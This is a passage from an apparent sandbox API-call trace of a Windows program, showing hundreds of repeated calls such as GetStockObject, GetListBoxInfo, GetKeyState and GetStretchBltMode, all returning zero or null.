(hdc=0x1) returned 0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetStockObject (i=789644) returned 0x0 [0091.995] GetListBoxInfo (hwnd=0x0) returned 0x0 [0091.998] GetKeyState (nVirtKey=1) returned 0 [0091.998] GetStretchBltMode (hdc=0x1) returned 0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetListBoxInfo (hwnd=0x0) returned 0x0 [0091.998] GetKeyState (nVirtKey=1) returned 0 [0091.998] GetStretchBltMode (hdc=0x1) returned 0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.998] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetListBoxInfo (hwnd=0x0) returned 0x0 [0091.999] GetKeyState (nVirtKey=1) returned 0 [0091.999] GetStretchBltMode (hdc=0x1) returned 0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetStockObject (i=789644) returned 0x0 [0091.999] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.000] GetKeyState (nVirtKey=1) returned 0 [0092.000] GetStretchBltMode (hdc=0x1) returned 0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.000] GetKeyState (nVirtKey=1) returned 0 [0092.000] GetStretchBltMode (hdc=0x1) returned 0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.000] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.001] GetKeyState (nVirtKey=1) returned 0 [0092.001] GetStretchBltMode (hdc=0x1) returned 0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.001] GetKeyState (nVirtKey=1) returned 0 [0092.001] GetStretchBltMode (hdc=0x1) returned 0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.001] GetStockObject (i=789644) returned 0x0 [0092.002] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.002] GetKeyState (nVirtKey=1) returned 0 [0092.002] GetStretchBltMode (hdc=0x1) returned 0 [0092.002] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.002] GetKeyState (nVirtKey=1) returned 0 [0092.002] GetStretchBltMode (hdc=0x1) returned 0 [0092.002] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.002] GetKeyState (nVirtKey=1) returned 0 [0092.002] GetStretchBltMode (hdc=0x1) returned 0 [0092.002] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.002] GetKeyState (nVirtKey=1) returned 0 [0092.002] GetStretchBltMode (hdc=0x1) returned 0 [0092.002] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.002] GetKeyState (nVirtKey=1) returned 0 [0092.002] GetStretchBltMode (hdc=0x1) returned 0 [0092.002] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.002] GetKeyState (nVirtKey=1) returned 0 [0092.002] GetStretchBltMode (hdc=0x1) returned 0 [0092.002] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.003] GetKeyState (nVirtKey=1) returned 0 [0092.003] GetStretchBltMode (hdc=0x1) returned 0 [0092.003] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.003] GetKeyState (nVirtKey=1) returned 0 [0092.003] GetStretchBltMode (hdc=0x1) returned 0 [0092.003] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.003] GetKeyState (nVirtKey=1) returned 0 [0092.003] GetStretchBltMode (hdc=0x1) returned 0 [0092.003] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.003] GetKeyState (nVirtKey=1) returned 0 [0092.003] GetStretchBltMode (hdc=0x1) returned 0 [0092.003] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.003] GetKeyState (nVirtKey=1) returned 0 [0092.003] GetStretchBltMode (hdc=0x1) returned 0 [0092.003] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.003] GetKeyState (nVirtKey=1) returned 0 [0092.003] GetStretchBltMode (hdc=0x1) returned 0 [0092.003] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.003] GetKeyState (nVirtKey=1) returned 0 [0092.003] GetStretchBltMode (hdc=0x1) returned 0 [0092.003] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.003] GetKeyState (nVirtKey=1) returned 0 [0092.003] GetStretchBltMode (hdc=0x1) returned 0 [0092.003] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.003] GetKeyState (nVirtKey=1) returned 0 [0092.003] GetStretchBltMode (hdc=0x1) returned 0 [0092.004] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.004] GetKeyState (nVirtKey=1) returned 0 [0092.004] GetStretchBltMode (hdc=0x1) returned 0 [0092.004] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.004] GetKeyState (nVirtKey=1) returned 0 [0092.004] GetStretchBltMode (hdc=0x1) returned 0 [0092.004] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.004] GetKeyState (nVirtKey=1) returned 0 [0092.004] GetStretchBltMode (hdc=0x1) returned 0 [0092.004] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.004] GetKeyState (nVirtKey=1) returned 0 [0092.004] GetStretchBltMode (hdc=0x1) returned 0 [0092.004] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.004] GetKeyState (nVirtKey=1) returned 0 [0092.004] GetStretchBltMode (hdc=0x1) returned 0 [0092.004] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.004] GetKeyState (nVirtKey=1) returned 0 [0092.004] GetStretchBltMode (hdc=0x1) returned 0 [0092.004] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.004] GetKeyState (nVirtKey=1) returned 0 [0092.004] GetStretchBltMode (hdc=0x1) returned 0 [0092.004] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.004] GetKeyState (nVirtKey=1) returned 0 [0092.004] GetStretchBltMode (hdc=0x1) returned 0 [0092.005] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.005] GetKeyState (nVirtKey=1) returned 0 [0092.005] GetStretchBltMode (hdc=0x1) returned 0 [0092.005] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.005] GetKeyState (nVirtKey=1) returned 0 [0092.005] GetStretchBltMode (hdc=0x1) returned 0 [0092.005] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.005] GetKeyState (nVirtKey=1) returned 0 [0092.005] GetStretchBltMode (hdc=0x1) returned 0 [0092.005] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.005] GetKeyState (nVirtKey=1) returned 0 [0092.005] GetStretchBltMode (hdc=0x1) returned 0 [0092.005] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.005] GetKeyState (nVirtKey=1) returned 0 [0092.005] GetStretchBltMode (hdc=0x1) returned 0 [0092.005] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.005] GetKeyState (nVirtKey=1) returned 0 [0092.005] GetStretchBltMode (hdc=0x1) returned 0 [0092.005] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.005] GetKeyState (nVirtKey=1) returned 0 [0092.005] GetStretchBltMode (hdc=0x1) returned 0 [0092.005] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.006] GetKeyState (nVirtKey=1) returned 0 [0092.006] GetStretchBltMode (hdc=0x1) returned 0 [0092.006] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.006] GetKeyState (nVirtKey=1) returned 0 [0092.006] GetStretchBltMode (hdc=0x1) returned 0 [0092.006] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.006] GetKeyState (nVirtKey=1) returned 0 [0092.006] GetStretchBltMode (hdc=0x1) returned 0 [0092.006] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.006] GetKeyState (nVirtKey=1) returned 0 [0092.006] GetStretchBltMode (hdc=0x1) returned 0 [0092.006] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.006] GetKeyState (nVirtKey=1) returned 0 [0092.006] GetStretchBltMode (hdc=0x1) returned 0 [0092.006] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.006] GetKeyState (nVirtKey=1) returned 0 [0092.006] GetStretchBltMode (hdc=0x1) returned 0 [0092.006] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.006] GetKeyState (nVirtKey=1) returned 0 [0092.006] GetStretchBltMode (hdc=0x1) returned 0 [0092.006] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.006] GetKeyState (nVirtKey=1) returned 0 [0092.006] GetStretchBltMode (hdc=0x1) returned 0 [0092.007] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.007] GetKeyState (nVirtKey=1) returned 0 [0092.007] GetStretchBltMode (hdc=0x1) returned 0 [0092.007] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.007] GetKeyState (nVirtKey=1) returned 0 [0092.007] GetStretchBltMode (hdc=0x1) returned 0 [0092.007] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.007] GetKeyState (nVirtKey=1) returned 0 [0092.007] GetStretchBltMode (hdc=0x1) returned 0 [0092.007] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.007] GetKeyState (nVirtKey=1) returned 0 [0092.007] GetStretchBltMode (hdc=0x1) returned 0 [0092.007] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.007] GetKeyState (nVirtKey=1) returned 0 [0092.007] GetStretchBltMode (hdc=0x1) returned 0 [0092.007] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.007] GetKeyState (nVirtKey=1) returned 0 [0092.007] GetStretchBltMode (hdc=0x1) returned 0 [0092.007] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.007] GetKeyState (nVirtKey=1) returned 0 [0092.007] GetStretchBltMode (hdc=0x1) returned 0 [0092.007] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.007] GetKeyState (nVirtKey=1) returned 0 [0092.008] GetStretchBltMode (hdc=0x1) returned 0 [0092.008] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.008] GetKeyState (nVirtKey=1) returned 0 [0092.008] GetStretchBltMode (hdc=0x1) returned 0 [0092.008] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.008] GetKeyState (nVirtKey=1) returned 0 [0092.008] GetStretchBltMode (hdc=0x1) returned 0 [0092.008] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.008] GetKeyState (nVirtKey=1) returned 0 [0092.008] GetStretchBltMode (hdc=0x1) returned 0 [0092.008] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.008] GetKeyState (nVirtKey=1) returned 0 [0092.008] GetStretchBltMode (hdc=0x1) returned 0 [0092.008] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.008] GetKeyState (nVirtKey=1) returned 0 [0092.008] GetStretchBltMode (hdc=0x1) returned 0 [0092.008] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.008] GetKeyState (nVirtKey=1) returned 0 [0092.008] GetStretchBltMode (hdc=0x1) returned 0 [0092.008] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.008] GetKeyState (nVirtKey=1) returned 0 [0092.008] GetStretchBltMode (hdc=0x1) returned 0 [0092.009] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.009] GetKeyState (nVirtKey=1) returned 0 [0092.009] GetStretchBltMode (hdc=0x1) returned 0 [0092.009] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.009] GetKeyState (nVirtKey=1) returned 0 [0092.009] GetStretchBltMode (hdc=0x1) returned 0 [0092.009] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.009] GetKeyState (nVirtKey=1) returned 0 [0092.009] GetStretchBltMode (hdc=0x1) returned 0 [0092.009] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.009] GetKeyState (nVirtKey=1) returned 0 [0092.009] GetStretchBltMode (hdc=0x1) returned 0 [0092.009] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.009] GetKeyState (nVirtKey=1) returned 0 [0092.009] GetStretchBltMode (hdc=0x1) returned 0 [0092.009] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.009] GetKeyState (nVirtKey=1) returned 0 [0092.010] GetStretchBltMode (hdc=0x1) returned 0 [0092.010] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.010] GetKeyState (nVirtKey=1) returned 0 [0092.010] GetStretchBltMode (hdc=0x1) returned 0 [0092.010] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.010] GetKeyState (nVirtKey=1) returned 0 [0092.010] GetStretchBltMode (hdc=0x1) returned 0 [0092.010] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.010] GetKeyState (nVirtKey=1) returned 0 [0092.010] GetStretchBltMode (hdc=0x1) returned 0 [0092.010] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.073] GetKeyState (nVirtKey=1) returned 0 [0092.073] GetStretchBltMode (hdc=0x1) returned 0 [0092.073] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.073] GetKeyState (nVirtKey=1) returned 0 [0092.073] GetStretchBltMode (hdc=0x1) returned 0 [0092.073] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.073] GetKeyState (nVirtKey=1) returned 0 [0092.073] GetStretchBltMode (hdc=0x1) returned 0 [0092.073] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.073] GetKeyState (nVirtKey=1) returned 0 [0092.073] GetStretchBltMode (hdc=0x1) returned 0 [0092.073] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.074] GetKeyState (nVirtKey=1) returned 0 [0092.074] GetStretchBltMode (hdc=0x1) returned 0 [0092.074] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.074] GetKeyState (nVirtKey=1) returned 0 [0092.074] GetStretchBltMode (hdc=0x1) returned 0 [0092.074] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.074] GetKeyState (nVirtKey=1) returned 0 [0092.074] GetStretchBltMode (hdc=0x1) returned 0 [0092.074] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.074] GetKeyState (nVirtKey=1) returned 0 [0092.074] GetStretchBltMode (hdc=0x1) returned 0 [0092.074] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.074] GetKeyState (nVirtKey=1) returned 0 [0092.074] GetStretchBltMode (hdc=0x1) returned 0 [0092.074] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.074] GetKeyState (nVirtKey=1) returned 0 [0092.074] GetStretchBltMode (hdc=0x1) returned 0 [0092.074] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.074] GetKeyState (nVirtKey=1) returned 0 [0092.074] GetStretchBltMode (hdc=0x1) returned 0 [0092.074] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.074] GetKeyState (nVirtKey=1) returned 0 [0092.074] GetStretchBltMode (hdc=0x1) returned 0 [0092.074] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.074] GetKeyState (nVirtKey=1) returned 0 [0092.075] GetStretchBltMode (hdc=0x1) returned 0 [0092.075] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.075] GetKeyState (nVirtKey=1) returned 0 [0092.075] GetStretchBltMode (hdc=0x1) returned 0 [0092.075] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.075] GetKeyState (nVirtKey=1) returned 0 [0092.075] GetStretchBltMode (hdc=0x1) returned 0 [0092.075] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.075] GetKeyState (nVirtKey=1) returned 0 [0092.075] GetStretchBltMode (hdc=0x1) returned 0 [0092.075] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.075] GetKeyState (nVirtKey=1) returned 0 [0092.075] GetStretchBltMode (hdc=0x1) returned 0 [0092.075] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.075] GetKeyState (nVirtKey=1) returned 0 [0092.075] GetStretchBltMode (hdc=0x1) returned 0 [0092.075] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.075] GetKeyState (nVirtKey=1) returned 0 [0092.075] GetStretchBltMode (hdc=0x1) returned 0 [0092.075] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.075] GetKeyState (nVirtKey=1) returned 0 [0092.075] GetStretchBltMode (hdc=0x1) returned 0 [0092.075] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.076] GetKeyState (nVirtKey=1) returned 0 [0092.076] GetStretchBltMode (hdc=0x1) returned 0 [0092.076] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.076] GetKeyState (nVirtKey=1) returned 0 [0092.076] GetStretchBltMode (hdc=0x1) returned 0 [0092.076] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.076] GetKeyState (nVirtKey=1) returned 0 [0092.076] GetStretchBltMode (hdc=0x1) returned 0 [0092.076] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.076] GetKeyState (nVirtKey=1) returned 0 [0092.076] GetStretchBltMode (hdc=0x1) returned 0 [0092.076] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.076] GetKeyState (nVirtKey=1) returned 0 [0092.076] GetStretchBltMode (hdc=0x1) returned 0 [0092.076] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.076] GetKeyState (nVirtKey=1) returned 0 [0092.076] GetStretchBltMode (hdc=0x1) returned 0 [0092.076] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.076] GetKeyState (nVirtKey=1) returned 0 [0092.076] GetStretchBltMode (hdc=0x1) returned 0 [0092.076] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.076] GetKeyState (nVirtKey=1) returned 0 [0092.076] GetStretchBltMode (hdc=0x1) returned 0 [0092.077] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.077] GetKeyState (nVirtKey=1) returned 0 [0092.077] GetStretchBltMode (hdc=0x1) returned 0 [0092.077] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.077] GetKeyState (nVirtKey=1) returned 0 [0092.077] GetStretchBltMode (hdc=0x1) returned 0 [0092.077] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.077] GetKeyState (nVirtKey=1) returned 0 [0092.077] GetStretchBltMode (hdc=0x1) returned 0 [0092.077] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.077] GetKeyState (nVirtKey=1) returned 0 [0092.077] GetStretchBltMode (hdc=0x1) returned 0 [0092.077] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.077] GetKeyState (nVirtKey=1) returned 0 [0092.077] GetStretchBltMode (hdc=0x1) returned 0 [0092.077] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.077] GetKeyState (nVirtKey=1) returned 0 [0092.077] GetStretchBltMode (hdc=0x1) returned 0 [0092.077] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.077] GetKeyState (nVirtKey=1) returned 0 [0092.077] GetStretchBltMode (hdc=0x1) returned 0 [0092.077] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.078] GetKeyState (nVirtKey=1) returned 0 [0092.078] GetStretchBltMode (hdc=0x1) returned 0 [0092.078] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.078] GetKeyState (nVirtKey=1) returned 0 [0092.078] GetStretchBltMode (hdc=0x1) returned 0 [0092.078] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.078] GetKeyState (nVirtKey=1) returned 0 [0092.078] GetStretchBltMode (hdc=0x1) returned 0 [0092.078] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.078] GetKeyState (nVirtKey=1) returned 0 [0092.078] GetStretchBltMode (hdc=0x1) returned 0 [0092.078] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.078] GetKeyState (nVirtKey=1) returned 0 [0092.078] GetStretchBltMode (hdc=0x1) returned 0 [0092.078] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.078] GetKeyState (nVirtKey=1) returned 0 [0092.078] GetStretchBltMode (hdc=0x1) returned 0 [0092.078] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.078] GetKeyState (nVirtKey=1) returned 0 [0092.078] GetStretchBltMode (hdc=0x1) returned 0 [0092.078] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.078] GetKeyState (nVirtKey=1) returned 0 [0092.078] GetStretchBltMode (hdc=0x1) returned 0 [0092.078] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.079] GetKeyState (nVirtKey=1) returned 0 [0092.079] GetStretchBltMode (hdc=0x1) returned 0 [0092.079] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.079] GetKeyState (nVirtKey=1) returned 0 [0092.079] GetStretchBltMode (hdc=0x1) returned 0 [0092.079] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.079] GetKeyState (nVirtKey=1) returned 0 [0092.079] GetStretchBltMode (hdc=0x1) returned 0 [0092.079] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.079] GetKeyState (nVirtKey=1) returned 0 [0092.079] GetStretchBltMode (hdc=0x1) returned 0 [0092.079] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.079] GetKeyState (nVirtKey=1) returned 0 [0092.079] GetStretchBltMode (hdc=0x1) returned 0 [0092.079] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.079] GetKeyState (nVirtKey=1) returned 0 [0092.079] GetStretchBltMode (hdc=0x1) returned 0 [0092.079] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.079] GetKeyState (nVirtKey=1) returned 0 [0092.079] GetStretchBltMode (hdc=0x1) returned 0 [0092.079] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.079] GetKeyState (nVirtKey=1) returned 0 [0092.080] GetStretchBltMode (hdc=0x1) returned 0 [0092.080] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.080] GetKeyState (nVirtKey=1) returned 0 [0092.080] GetStretchBltMode (hdc=0x1) returned 0 [0092.080] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.080] GetKeyState (nVirtKey=1) returned 0 [0092.080] GetStretchBltMode (hdc=0x1) returned 0 [0092.080] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.080] GetKeyState (nVirtKey=1) returned 0 [0092.080] GetStretchBltMode (hdc=0x1) returned 0 [0092.080] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.080] GetKeyState (nVirtKey=1) returned 0 [0092.080] GetStretchBltMode (hdc=0x1) returned 0 [0092.080] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.080] GetKeyState (nVirtKey=1) returned 0 [0092.080] GetStretchBltMode (hdc=0x1) returned 0 [0092.080] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.080] GetKeyState (nVirtKey=1) returned 0 [0092.080] GetStretchBltMode (hdc=0x1) returned 0 [0092.081] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.081] GetKeyState (nVirtKey=1) returned 0 [0092.081] GetStretchBltMode (hdc=0x1) returned 0 [0092.081] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.081] GetKeyState (nVirtKey=1) returned 0 [0092.081] GetStretchBltMode (hdc=0x1) returned 0 [0092.081] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.081] GetKeyState (nVirtKey=1) returned 0 [0092.081] GetStretchBltMode (hdc=0x1) returned 0 [0092.081] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.081] GetKeyState (nVirtKey=1) returned 0 [0092.081] GetStretchBltMode (hdc=0x1) returned 0 [0092.081] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.081] GetKeyState (nVirtKey=1) returned 0 [0092.081] GetStretchBltMode (hdc=0x1) returned 0 [0092.081] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.081] GetKeyState (nVirtKey=1) returned 0 [0092.081] GetStretchBltMode (hdc=0x1) returned 0 [0092.081] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.082] GetKeyState (nVirtKey=1) returned 0 [0092.082] GetStretchBltMode (hdc=0x1) returned 0 [0092.082] GetListBoxInfo (hwnd=0x0) returned 0x0 